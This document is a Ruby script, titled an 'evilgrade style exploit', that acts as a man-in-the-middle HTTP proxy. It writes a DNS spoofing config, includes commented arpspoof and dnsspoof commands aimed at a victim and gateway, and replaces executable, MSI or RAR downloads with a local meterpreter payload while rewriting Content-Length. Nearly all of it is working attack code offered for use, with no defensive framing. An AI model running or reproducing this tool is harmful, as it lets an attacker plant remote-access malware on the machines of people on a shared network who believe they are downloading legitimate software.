evilgrade style exploit. . . by bigmac

#sudo ruby proxy.rb port
#sudo ruby proxy.rb 666
#sudo is need for opening a socket
require 'eventmachine' #must install eventeventmachine
prox_port=ARGV[0]
attacker_ip="192.168.0.2" #local host
meterpreter="/tmp/meterpreter" # search this script and replace /home/bigmac/tmp/meterpreter
#meterpreter.EXE meterpreter.MSI meterpreter.RAR meterpreter.ZIP
#if the meterpreter exist with the file extension the client is attempting to download then the switch will be made

dns = File.open("dns.conf", "w+")   # set up for dns spoofing domains to this proxy
dns.write("#{attacker_ip}        *.*")# this is your ip,
dns.close


#      uncommment these lines when you want to use arpsoof/dns
#victim="192.168.1.111"
#gateway="192.168.1.1"
#`pkill spoof`
#a=Thread.new{system"xterm -e 'arpspoof -i wlan0 -t #{victim} #{gateway}'"}
#c=Thread.new{system"xterm -e 'arpspoof -i wlan0 -t #{gateway} #{victim}'"}
#b=Thread.new{system"xterm -e 'dnsspoof -i wlan0 -f dns.conf'"}
#a.run
#b.run
#c.run
Thread.start{
class Client < EM::Connection
        def initialize(other, finger, *args, &blk)
                @other, @finger = other, finger
                super(*args, &blk)
        end


        def post_init
        @payload_extension=""
          send_data @finger.sub("Accept-Encoding:","Assept-Ensoding:") #send a get request, but disable encoding gzip
                for x in [".exe",".rar",".msi"]# payload format list, checking for file extension... add more of these to the list
                        extension_check=@finger.scan(/#{x}/).to_s
                        if extension_check.length>1
                        @payload_extension<<extension_check
                        end
                end
                if @payload_extension.length==0
                        @payload_extension=""

                end

        end

#Content-Type: application/x-msdos-program
#Content-Type: application/x-msdownload
#Content-Type: application/octet-stream
#Content-Type: application/x-msihttp://www.i8igmac.tk/file.exe
#Content-Type: application/x-rar
#Content-Type: application/octet-stream
#a list of possable application download... maybe check the GET request for jar? exe? msi? rar?

        def receive_data(response)  # this is the part that the web client will see... change with evil code
         clength = response.scan(/Content-Length: \d+/).to_s.sub("Content-Length: ","")
                if response.scan("Content-Length: ").to_s == "Content-Length: " # if true

                        if @payload_extension.length>1 # if true
                                for trigger in ["application/x-msdos-program","application/x-msdownload","application/octet-stream","application/x-msi","applictation/x-rar","application/rar","application/octet-stream"] # add more triggers to this list
                                        if response.scan("#{trigger}").to_s.length>1 # if string is found, trigger

                                                if File.exists?("/tmp/meterpreter#{@payload_extension.downcase}")#= true
                                                puts " injecting #{@payload_extension} SUCCESS"#we need to check if payload exist and use this extension
                                                payload=File.read("/tmp/meterpreter#{@payload_extension.downcase}")#if the payload  does not exist then this will break the script
                                                headers,body = response.split("\r\n\r\n", 2)
                                                @other.send_data headers.gsub(clength,payload.length.to_s)+"\r\n\r\n"+payload
                                                else
                                                puts "payload does not exist? meterpreter#{@payload_extension} sending unmodified data"
                                                end

                                        end
                                end #start for trigger loop
                        end#start of if payload extension.length

                end
                        @other.send_data response
                        #if no injection was found, send the unmodifi we pass to the webbrowsered response to the client
        end


end
      #browser open to http://192.168.1.114
      module EchoServer
       def receive_data(finger) #finger is the header recived from the client, could log these cookies or log these pages
         ping = finger.gsub(" ","").index("Host:")
         pong = finger.gsub(" ","").index("\n",ping)
         host = finger.gsub(" ","")[ping..pong].gsub("Host:","").chomp #old method for gathering the host: field... could shorten this
         #i dont know if this will prevent loading from cache
         data=finger.sub("If-None-Match:","If-None-MutXX:").sub("If-Modified-Since:","If-Modified-SXnce:")
          EventMachine::connect host, 80, Client, self, data # ask google for response...
        end
end
}
      EventMachine::run {
        EventMachine::start_server attacker_ip, prox_port, EchoServer
      }        #             YOUR IP